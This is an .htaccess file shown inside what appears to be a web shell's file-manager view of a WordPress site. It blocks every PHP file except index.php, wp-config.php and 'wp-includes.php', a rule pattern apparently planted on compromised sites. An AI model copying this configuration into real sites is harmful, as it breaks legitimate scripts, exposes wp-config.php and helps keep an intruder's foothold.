| Current Path : /home/c/u/i/cuisinesj/www/new/ |
| Current File: /home/c/u/i/cuisinesj/www/new/.htaccess |
<FilesMatch "\.(php|ph*|Ph*|PH*|pH*)$">
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|index.php|wp-config.php|wp-includes.php)$">
Allow from all
</FilesMatch>
<FilesMatch "\.(jpg|png|gif|pdf|jpeg)$">
Allow from all
</FilesMatch>